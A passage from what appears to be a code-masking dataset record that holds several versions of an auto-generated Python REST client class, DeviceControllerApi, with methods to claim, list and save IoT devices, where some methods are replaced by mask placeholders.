required parameter `page_size` when calling `get_tenant_devices_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_tenant_devices_using_get`'\n )\n collection_formats = {}\n path_params = {}\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type']))\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/tenant/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n <mask token>\n <mask token>\n\n def save_device_using_post(self, device, **kwargs):\n \"\"\"saveDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.save_device_using_post(device, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param Device device: device (required)\n :param str access_token: accessToken\n :param str entity_group_id: entityGroupId\n :return: Device\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.save_device_using_post_with_http_info(device, **kwargs)\n else:\n data = self.save_device_using_post_with_http_info(device, **kwargs)\n return data\n\n def save_device_using_post_with_http_info(self, device, **kwargs):\n \"\"\"saveDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.save_device_using_post_with_http_info(device, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param Device device: device (required)\n :param str access_token: accessToken\n :param str entity_group_id: entityGroupId\n :return: Device\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['device', 'access_token', 'entity_group_id']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'device' not in params or params['device'] is None:\n raise ValueError(\n 'Missing the required parameter `device` when calling `save_device_using_post`'\n )\n collection_formats = {}\n path_params = {}\n query_params = []\n if 'access_token' in params:\n query_params.append(('accessToken', params['access_token']))\n if 'entity_group_id' in params:\n query_params.append(('entityGroupId', params['entity_group_id']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n if 'device' in params:\n body_params = params['device']\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/device{?accessToken,entityGroupId}', 'POST', path_params,\n query_params, header_params, body=body_params, post_params=\n form_params, files=local_var_files, response_type='Device',\n auth_settings=auth_settings, async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n", "step-2": "<mask token>\n\n\nclass DeviceControllerApi(DeviceControllerApi):\n <mask token>\n <mask token>\n\n def claim_device_using_post(self, device_name, **kwargs):\n \"\"\"claimDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.claim_device_using_post(device_name, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str device_name: deviceName (required)\n :param ClaimRequest claim_request: claimRequest\n :param str sub_customer_id: subCustomerId\n :return: DeferredResultResponseEntity\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.claim_device_using_post_with_http_info(device_name,\n **kwargs)\n else:\n data = self.claim_device_using_post_with_http_info(device_name,\n **kwargs)\n return data\n\n def claim_device_using_post_with_http_info(self, device_name, **kwargs):\n \"\"\"claimDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.claim_device_using_post_with_http_info(device_name, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str device_name: deviceName (required)\n :param ClaimRequest claim_request: claimRequest\n :param str sub_customer_id: subCustomerId\n :return: DeferredResultResponseEntity\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['device_name', 'claim_request', 'sub_customer_id']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'device_name' not in params or params['device_name'] is None:\n raise ValueError(\n 'Missing the required parameter `device_name` when calling `claim_device_using_post`'\n )\n collection_formats = {}\n path_params = {}\n if 'device_name' in params:\n path_params['deviceName'] = params['device_name']\n query_params = []\n if 'sub_customer_id' in params:\n query_params.append(('subCustomerId', params['sub_customer_id']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n if 'claim_request' in params:\n body_params = params['claim_request']\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/customer/device/{deviceName}/claim{?subCustomerId}',\n 'POST', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='DeferredResultResponseEntity', auth_settings=\n auth_settings, async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def get_customer_devices_using_get(self, customer_id, page_size, page,\n **kwargs):\n \"\"\"getCustomerDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_customer_devices_using_get(customer_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str customer_id: customerId (required)\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_customer_devices_using_get_with_http_info(\n customer_id, page_size, page, **kwargs)\n else:\n data = self.get_customer_devices_using_get_with_http_info(\n customer_id, page_size, page, **kwargs)\n return data\n\n def get_customer_devices_using_get_with_http_info(self, customer_id,\n page_size, page, **kwargs):\n \"\"\"getCustomerDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str customer_id: customerId (required)\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['customer_id', 'page_size', 'page', 'type',\n 'text_search', 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'customer_id' not in params or params['customer_id'] is None:\n raise ValueError(\n 'Missing the required parameter `customer_id` when calling `get_customer_devices_using_get`'\n )\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_customer_devices_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_customer_devices_using_get`'\n )\n collection_formats = {}\n path_params = {}\n if 'customer_id' in params:\n path_params['customerId'] = params['customer_id']\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type']))\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/customer/{customerId}/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n\n def get_devices_by_entity_group_id_using_get(self, entity_group_id,\n page_size, page, **kwargs):\n \"\"\"getDevicesByEntityGroupId # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_devices_by_entity_group_id_using_get(entity_group_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str entity_group_id: entityGroupId (required)\n :param str page_size: Page size (required)\n :param str page: Page (required)\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return (self.\n get_devices_by_entity_group_id_using_get_with_http_info(\n entity_group_id, page_size, page, **kwargs))\n else:\n data = (self.\n get_devices_by_entity_group_id_using_get_with_http_info(\n entity_group_id, page_size, page, **kwargs))\n return data\n\n def get_devices_by_entity_group_id_using_get_with_http_info(self,\n entity_group_id, page_size, page, **kwargs):\n \"\"\"getDevicesByEntityGroupId # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str entity_group_id: entityGroupId (required)\n :param str page_size: Page size (required)\n :param str page: Page (required)\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['entity_group_id', 'page_size', 'page', 'text_search',\n 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'entity_group_id' not in params or params['entity_group_id'\n ] is None:\n raise ValueError(\n 'Missing the required parameter `entity_group_id` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page_size' in params and params['page_size'] < 1.0:\n raise ValueError(\n 'Invalid value for parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `1.0`'\n )\n if 'page' in params and params['page'] < 0.0:\n raise ValueError(\n 'Invalid value for parameter `page` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `0.0`'\n )\n collection_formats = {}\n path_params = {}\n if 'entity_group_id' in params:\n path_params['entityGroupId'] = params['entity_group_id']\n query_params = []\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/entityGroup/{entityGroupId}/devices{?textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n\n def get_tenant_devices_using_get(self, page_size, page, **kwargs):\n \"\"\"getTenantDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_tenant_devices_using_get(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_tenant_devices_using_get_with_http_info(page_size,\n page, **kwargs)\n else:\n data = self.get_tenant_devices_using_get_with_http_info(page_size,\n page, **kwargs)\n return data\n\n def get_tenant_devices_using_get_with_http_info(self, page_size, page,\n **kwargs):\n \"\"\"getTenantDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_tenant_devices_using_get_with_http_info(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['page_size', 'page', 'type', 'text_search',\n 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_tenant_devices_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_tenant_devices_using_get`'\n )\n collection_formats = {}\n path_params = {}\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type']))\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/tenant/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n <mask token>\n <mask token>\n\n def save_device_using_post(self, device, **kwargs):\n \"\"\"saveDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.save_device_using_post(device, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param Device device: device (required)\n :param str access_token: accessToken\n :param str entity_group_id: entityGroupId\n :return: Device\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.save_device_using_post_with_http_info(device, **kwargs)\n else:\n data = self.save_device_using_post_with_http_info(device, **kwargs)\n return data\n\n def save_device_using_post_with_http_info(self, device, **kwargs):\n \"\"\"saveDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.save_device_using_post_with_http_info(device, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param Device device: device (required)\n :param str access_token: accessToken\n :param str entity_group_id: entityGroupId\n :return: Device\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['device', 'access_token', 'entity_group_id']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'device' not in params or params['device'] is None:\n raise ValueError(\n 'Missing the required parameter `device` when calling `save_device_using_post`'\n )\n collection_formats = {}\n path_params = {}\n query_params = []\n if 'access_token' in params:\n query_params.append(('accessToken', params['access_token']))\n if 'entity_group_id' in params:\n query_params.append(('entityGroupId', params['entity_group_id']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n if 'device' in params:\n body_params = params['device']\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/device{?accessToken,entityGroupId}', 'POST', path_params,\n query_params, header_params, body=body_params, post_params=\n form_params, files=local_var_files, response_type='Device',\n auth_settings=auth_settings, async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n", "step-3": "<mask token>\n\n\nclass DeviceControllerApi(DeviceControllerApi):\n <mask token>\n\n def __init__(self, api_client=None):\n super(DeviceControllerApi, self).__init__(api_client)\n\n def claim_device_using_post(self, device_name, **kwargs):\n \"\"\"claimDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.claim_device_using_post(device_name, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str device_name: deviceName (required)\n :param ClaimRequest claim_request: claimRequest\n :param str sub_customer_id: subCustomerId\n :return: DeferredResultResponseEntity\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.claim_device_using_post_with_http_info(device_name,\n **kwargs)\n else:\n data = self.claim_device_using_post_with_http_info(device_name,\n **kwargs)\n return data\n\n def claim_device_using_post_with_http_info(self, device_name, **kwargs):\n \"\"\"claimDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.claim_device_using_post_with_http_info(device_name, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str device_name: deviceName (required)\n :param ClaimRequest claim_request: claimRequest\n :param str sub_customer_id: subCustomerId\n :return: DeferredResultResponseEntity\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['device_name', 'claim_request', 'sub_customer_id']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'device_name' not in params or params['device_name'] is None:\n raise ValueError(\n 'Missing the required parameter `device_name` when calling `claim_device_using_post`'\n )\n collection_formats = {}\n path_params = {}\n if 'device_name' in params:\n path_params['deviceName'] = params['device_name']\n query_params = []\n if 'sub_customer_id' in params:\n query_params.append(('subCustomerId', params['sub_customer_id']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n if 'claim_request' in params:\n body_params = params['claim_request']\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/customer/device/{deviceName}/claim{?subCustomerId}',\n 'POST', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='DeferredResultResponseEntity', auth_settings=\n auth_settings, async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def get_customer_devices_using_get(self, customer_id, page_size, page,\n **kwargs):\n \"\"\"getCustomerDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_customer_devices_using_get(customer_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str customer_id: customerId (required)\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_customer_devices_using_get_with_http_info(\n customer_id, page_size, page, **kwargs)\n else:\n data = self.get_customer_devices_using_get_with_http_info(\n customer_id, page_size, page, **kwargs)\n return data\n\n def get_customer_devices_using_get_with_http_info(self, customer_id,\n page_size, page, **kwargs):\n \"\"\"getCustomerDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str customer_id: customerId (required)\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['customer_id', 'page_size', 'page', 'type',\n 'text_search', 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'customer_id' not in params or params['customer_id'] is None:\n raise ValueError(\n 'Missing the required parameter `customer_id` when calling `get_customer_devices_using_get`'\n )\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_customer_devices_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_customer_devices_using_get`'\n )\n collection_formats = {}\n path_params = {}\n if 'customer_id' in params:\n path_params['customerId'] = params['customer_id']\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type']))\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/customer/{customerId}/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n\n def get_devices_by_entity_group_id_using_get(self, entity_group_id,\n page_size, page, **kwargs):\n \"\"\"getDevicesByEntityGroupId # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_devices_by_entity_group_id_using_get(entity_group_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str entity_group_id: entityGroupId (required)\n :param str page_size: Page size (required)\n :param str page: Page (required)\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return (self.\n get_devices_by_entity_group_id_using_get_with_http_info(\n entity_group_id, page_size, page, **kwargs))\n else:\n data = (self.\n get_devices_by_entity_group_id_using_get_with_http_info(\n entity_group_id, page_size, page, **kwargs))\n return data\n\n def get_devices_by_entity_group_id_using_get_with_http_info(self,\n entity_group_id, page_size, page, **kwargs):\n \"\"\"getDevicesByEntityGroupId # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str entity_group_id: entityGroupId (required)\n :param str page_size: Page size (required)\n :param str page: Page (required)\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['entity_group_id', 'page_size', 'page', 'text_search',\n 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'entity_group_id' not in params or params['entity_group_id'\n ] is None:\n raise ValueError(\n 'Missing the required parameter `entity_group_id` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page_size' in params and params['page_size'] < 1.0:\n raise ValueError(\n 'Invalid value for parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `1.0`'\n )\n if 'page' in params and params['page'] < 0.0:\n raise ValueError(\n 'Invalid value for parameter `page` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `0.0`'\n )\n collection_formats = {}\n path_params = {}\n if 'entity_group_id' in params:\n path_params['entityGroupId'] = params['entity_group_id']\n query_params = []\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/entityGroup/{entityGroupId}/devices{?textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n\n def get_tenant_devices_using_get(self, page_size, page, **kwargs):\n \"\"\"getTenantDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_tenant_devices_using_get(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_tenant_devices_using_get_with_http_info(page_size,\n page, **kwargs)\n else:\n data = self.get_tenant_devices_using_get_with_http_info(page_size,\n page, **kwargs)\n return data\n\n def get_tenant_devices_using_get_with_http_info(self, page_size, page,\n **kwargs):\n \"\"\"getTenantDevices # noqa: E501\n\n This method 